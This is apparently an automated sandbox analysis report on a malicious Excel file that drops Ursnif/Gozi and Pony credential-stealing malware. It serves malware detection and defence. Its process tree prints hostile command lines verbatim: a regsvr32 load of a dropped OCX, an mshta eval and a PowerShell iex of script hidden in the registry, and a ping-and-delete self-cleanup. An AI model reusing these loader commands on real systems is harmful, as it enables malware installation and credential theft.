Analysis

  • max time kernel
    150s
  • max time network
    136s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    14-07-2020 05:19

General

  • Target

    tr_9.xls

  • Size

    90KB

  • MD5

    9cf44f1dd44ea313a0d931130ebb1aaf

  • SHA1

    0243be928d28f5b75d4d58af445b6d1b0350ee2c

  • SHA256

    c18e2c68d372caf4cfd5ead1dcfe93d369a93fdc9198c76152283c4e747ecad5

  • SHA512

    e7644dfae5808829f6d5ee129ff2e250da1dd257a3657becec472a562404aa12b6e7ab7b6eba5d93e4a39b02e89afa0b16a08e89adb150e271548bcd3cc9516f

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Checks whether UAC is enabled 3 IoCs
  • Suspicious use of SetWindowsHookEx 24 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Program crash 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of WriteProcessMemory 71 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 1958 IoCs
  • Suspicious use of AdjustPrivilegeToken 96 IoCs
  • Executes dropped EXE 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Checks for installed software on the system 1 TTPs 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    PID:3008
    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\tr_9.xls"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: AddClipboardFormatListener
      • Enumerates system info in registry
      • Suspicious use of WriteProcessMemory
      • Checks processor information in registry
      PID:4060
      • C:\Windows\System32\regsvr32.exe
        "C:\Windows\System32\regsvr32.exe" /s /i dDdoiBj.ocx
        3⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2064
        • C:\Windows\SysWOW64\regsvr32.exe
          /s /i dDdoiBj.ocx
          4⤵
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:2204
          • C:\Windows\SysWOW64\svchost.exe
            C:\Windows\System32\svchost.exe
            5⤵
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Checks for installed software on the system
            PID:1192
            • C:\Windows\SysWOW64\cmd.exe
              cmd /K
              6⤵
                PID:1608
              • C:\Windows\SysWOW64\svchost.exe
                C:\Windows\System32\svchost.exe
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1944
              • C:\Users\Admin\AppData\Local\Temp\BN35C0.tmp
                C:\Users\Admin\AppData\Local\Temp\BN35C0.tmp
                6⤵
                • Executes dropped EXE
                PID:2108
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 668
              5⤵
              • Program crash
              • Suspicious behavior: EnumeratesProcesses
              PID:2884
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2FFAFA40-C261-3936-44D3-167DB8B7AA01\\\Addrient'));if(!window.flag)close()</script>"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3000
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\2FFAFA40-C261-3936-44D3-167DB8B7AA01").appiness))
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          • Suspicious behavior: EnumeratesProcesses
          PID:2044
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cfsntbwc\cfsntbwc.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2052
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES971A.tmp" "c:\Users\Admin\AppData\Local\Temp\cfsntbwc\CSCF1148159F8FE457CB2B022E98816BEF7.TMP"
              5⤵
                PID:4016
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xpm5cy5i\xpm5cy5i.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3192
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES97E5.tmp" "c:\Users\Admin\AppData\Local\Temp\xpm5cy5i\CSCF6EAB5B4A5044976A1B55CBDFE26C71B.TMP"
                5⤵
                  PID:3768
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\BN35C0.tmp"
            2⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:3504
            • C:\Windows\system32\PING.EXE
              ping localhost -n 5
              3⤵
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Runs ping.exe
              PID:1840
          • C:\Windows\system32\cmd.exe
            cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\2D3D.bi1"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3536
            • C:\Windows\system32\nslookup.exe
              nslookup myip.opendns.com resolver1.opendns.com
              3⤵
                PID:1900
            • C:\Windows\system32\cmd.exe
              cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\2B39.bi1"
              2⤵
                PID:3780
                • C:\Windows\system32\nslookup.exe
                  nslookup myip.opendns.com resolver1.opendns.com
                  3⤵
                    PID:4080
                • C:\Windows\system32\cmd.exe
                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2D3D.bi1"
                  2⤵
                    PID:1624
                  • C:\Windows\system32\cmd.exe
                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2B39.bi1"
                    2⤵
                      PID:496
                  • C:\Windows\System32\RuntimeBroker.exe
                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                    1⤵
                      PID:3372
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                      1⤵
                      • Suspicious use of FindShellTrayWindow
                      • Checks whether UAC is enabled
                      • Suspicious use of SetWindowsHookEx
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:1936
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:82945 /prefetch:2
                        2⤵
                        • Checks whether UAC is enabled
                        • Suspicious use of SetWindowsHookEx
                        • Modifies Internet Explorer settings
                        PID:420
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:82952 /prefetch:2
                        2⤵
                        • Checks whether UAC is enabled
                        • Suspicious use of SetWindowsHookEx
                        • Modifies Internet Explorer settings
                        PID:3772

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Defense Evasion

                    Modify Registry

                    1
                    T1112

                    Credential Access

                    Credentials in Files

                    2
                    T1081

                    Discovery

                    Query Registry

                    3
                    T1012

                    System Information Discovery

                    2
                    T1082

                    Remote System Discovery

                    1
                    T1018

                    Collection

                    Data from Local System

                    2
                    T1005

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
                    • C:\Users\Admin\AppData\Local\Temp\2B39.bi1
                    • C:\Users\Admin\AppData\Local\Temp\2B39.bi1
                    • C:\Users\Admin\AppData\Local\Temp\2D3D.bi1
                    • C:\Users\Admin\AppData\Local\Temp\2D3D.bi1
                    • C:\Users\Admin\AppData\Local\Temp\BN35C0.tmp
                    • C:\Users\Admin\AppData\Local\Temp\BN35C0.tmp
                    • C:\Users\Admin\AppData\Local\Temp\RES971A.tmp
                    • C:\Users\Admin\AppData\Local\Temp\RES97E5.tmp
                    • C:\Users\Admin\AppData\Local\Temp\cfsntbwc\cfsntbwc.dll
                    • C:\Users\Admin\AppData\Local\Temp\xpm5cy5i\xpm5cy5i.dll
                    • C:\Users\Admin\Documents\dDdoiBj.ocx
                    • \??\c:\Users\Admin\AppData\Local\Temp\cfsntbwc\CSCF1148159F8FE457CB2B022E98816BEF7.TMP
                    • \??\c:\Users\Admin\AppData\Local\Temp\cfsntbwc\cfsntbwc.0.cs
                    • \??\c:\Users\Admin\AppData\Local\Temp\cfsntbwc\cfsntbwc.cmdline
                    • \??\c:\Users\Admin\AppData\Local\Temp\xpm5cy5i\CSCF6EAB5B4A5044976A1B55CBDFE26C71B.TMP
                    • \??\c:\Users\Admin\AppData\Local\Temp\xpm5cy5i\xpm5cy5i.0.cs
                    • \??\c:\Users\Admin\AppData\Local\Temp\xpm5cy5i\xpm5cy5i.cmdline
                    • \Users\Admin\Documents\dDdoiBj.ocx
                    • memory/420-75-0x0000000000000000-mapping.dmp
                    • memory/496-101-0x0000000000000000-mapping.dmp
                    • memory/1192-6-0x0000000000310000-0x0000000000319000-memory.dmp
                      Filesize

                      36KB

                    • memory/1192-4-0x0000000000310000-0x0000000000319000-memory.dmp
                      Filesize

                      36KB

                    • memory/1192-5-0x0000000000312960-mapping.dmp
                    • memory/1608-7-0x0000000000000000-mapping.dmp
                    • memory/1624-100-0x0000000000000000-mapping.dmp
                    • memory/1840-94-0x0000000000000000-mapping.dmp
                    • memory/1840-95-0x000000E737CA2000-mapping.dmp
                    • memory/1900-98-0x0000000000000000-mapping.dmp
                    • memory/1944-9-0x000000000BC01067-mapping.dmp
                    • memory/1944-10-0x000000000BC00000-0x000000000BC12000-memory.dmp
                      Filesize

                      72KB

                    • memory/1944-8-0x000000000BC00000-0x000000000BC12000-memory.dmp
                      Filesize

                      72KB

                    • memory/2044-77-0x0000000000000000-mapping.dmp
                    • memory/2052-78-0x0000000000000000-mapping.dmp
                    • memory/2064-0-0x0000000000000000-mapping.dmp
                    • memory/2108-14-0x0000000001056000-0x0000000001057000-memory.dmp
                      Filesize

                      4KB

                    • memory/2108-15-0x0000000001240000-0x0000000001241000-memory.dmp
                      Filesize

                      4KB

                    • memory/2108-11-0x0000000000000000-mapping.dmp
                    • memory/2204-21-0x0000000000000000-mapping.dmp
                    • memory/2204-74-0x00000000034C0000-0x00000000034C1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2204-73-0x0000000000000000-mapping.dmp
                    • memory/2204-2-0x0000000000000000-mapping.dmp
                    • memory/2204-72-0x0000000000000000-mapping.dmp
                    • memory/2204-22-0x0000000000000000-mapping.dmp
                    • memory/2204-20-0x0000000000000000-mapping.dmp
                    • memory/2884-19-0x0000000004F30000-0x0000000004F31000-memory.dmp
                      Filesize

                      4KB

                    • memory/2884-24-0x0000000005560000-0x0000000005561000-memory.dmp
                      Filesize

                      4KB

                    • memory/3192-85-0x0000000000000000-mapping.dmp
                    • memory/3504-92-0x0000000000000000-mapping.dmp
                    • memory/3504-93-0x000000ED6BA2E000-mapping.dmp
                    • memory/3536-96-0x0000000000000000-mapping.dmp
                    • memory/3768-88-0x0000000000000000-mapping.dmp
                    • memory/3772-76-0x0000000000000000-mapping.dmp
                    • memory/3780-97-0x0000000000000000-mapping.dmp
                    • memory/4016-81-0x0000000000000000-mapping.dmp
                    • memory/4080-99-0x0000000000000000-mapping.dmp